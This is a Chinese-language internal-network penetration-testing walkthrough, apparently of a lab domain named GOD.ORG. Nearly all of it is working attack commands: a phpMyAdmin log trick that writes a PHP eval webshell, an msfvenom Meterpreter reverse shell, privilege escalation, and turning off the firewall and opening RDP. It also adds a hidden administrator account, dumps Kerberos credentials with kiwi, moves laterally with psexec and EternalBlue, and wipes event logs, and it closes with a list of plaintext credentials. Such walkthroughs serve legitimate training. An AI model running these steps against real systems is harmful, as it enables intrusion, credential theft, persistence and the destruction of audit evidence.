内网渗透测试全流程技术文档

1. 信息收集阶段

1.1 端口扫描与识别

nmap -sS -A -T4 192.168.52.143

• -sS: TCP SYN扫描
• -A: 启用操作系统检测和版本检测
• -T4: 设置扫描速度为4(较快)

1.2 Web目录扫描

• 访问80端口
• 使用工具如DirBuster、gobuster等进行目录扫描

2. 漏洞利用与初始访问

2.1 通过PHPMyAdmin获取WebShell

1. 访问phpmyadmin并使用root弱口令登录
2. 执行SQL语句查看日志状态:

SHOW VARIABLES LIKE 'general%'

3. 开启SQL日志并设置路径:

SET GLOBAL general_log = "ON";
SET GLOBAL general_log_file = 'C:/phpStudy/www/log.php';

4. 写入一句话木马:

SELECT "<?php eval($_POST['cmd']);?>";

2.2 通过Web后台获取WebShell

1. 使用数据库中获取的账号密码(admin/123456)登录后台
2. 找到可编辑的PHP文件
3. 插入一句话木马:

<?php eval($_POST['cmd']);?>

3. 权限提升

3.1 生成Meterpreter后门

使用msfvenom生成Windows后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 -f exe -o shell.exe

3.2 设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit

3.3 解决乱码问题

chcp 65001

3.4 信息收集

net config workstation
net time /domain
ping owa.god.org
net view

3.5 本地提权

getsystem

4. 横向移动

4.1 开启远程桌面

1. 检查3389端口状态:

netstat -ano | findstr "3389"

2. 查看远程登录端口:

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

3. 开启远程桌面:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

4.2 防火墙配置

1. 查看防火墙配置:

netsh firewall show config

2. 关闭防火墙(Server 2003之前):

netsh firewall set opmode disable

3. 关闭防火墙(Server 2003之后):

netsh advfirewall set allprofiles state off

4. 允许3389端口:

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

4.3 创建后门用户

net user guest test@888 /add
net localgroup administrators guest /add
set user guest /active:yes

5. 域渗透

5.1 获取域凭据

load kiwi
creds_kerberos

5.2 检查域管理员权限

net group "domain admins" /domain

5.3 令牌窃取

1. 查看运行进程:

ps

2. 迁移到高权限进程:

migrate 2880

5.4 使用psexec横向移动

use exploit/windows/smb/psexec
set RHOST 192.168.53.138
set SMBDomain GOD.ORG
set SMBPass admin@888
set SMBUser Administrator
exploit

5.5 添加路由

run post/multi/manage/autoroute
run get_local_subnets
run autoroute -s 192.168.52.0/24
run autoroute -p

6. 永恒之蓝利用

1. 上传fscan.exe扫描C段
2. 发现存在永恒之蓝漏洞的主机
3. 利用漏洞获取域控服务器(192.168.52.138)权限
4. 开启目标服务器(192.168.52.141)的3389端口

7. Cobalt Strike后门

1. 生成后门并通过msf上传
2. 进行提权操作

8. 日志清除

8.1 手动清除日志

1. 通过远程桌面:

开始 > 程序 > 管理工具 > 计算机管理 > 系统工具 > 事件查看器 > 清除日志

8.2 使用wevtutil工具

wevtutil el  # 列出所有日志
wevtutil cl system  # 清除系统日志
wevtutil cl application  # 清除应用程序日志
wevtutil cl security  # 清除安全日志

8.3 Meterpreter清除日志

clearev

8.4 清除Recent记录

1. 图形界面:

文件资源管理器 > 查看 > 选项 > 常规 > 隐私 > 清除

2. 命令行:

del /f /s /q "%userprofile%\Recent\*.*"

9. 关键信息总结

• 域控信息:

  • 域名: GOD.ORG
  • 域控IP: 192.168.52.138 (OWA)
  • 其他服务器: 192.168.52.141 (ROOT-TVI862UBEH)

• 凭据信息:

  • 本地管理员: administrator/admin@888
  • 域管理员: Administrator@GOD.ORG/admin@888
  • Web后台: admin/123456
  • 后门用户: guest/test@888

• 网络信息:

  • 内网网段: 192.168.52.0/24
  • 远程桌面端口: 3389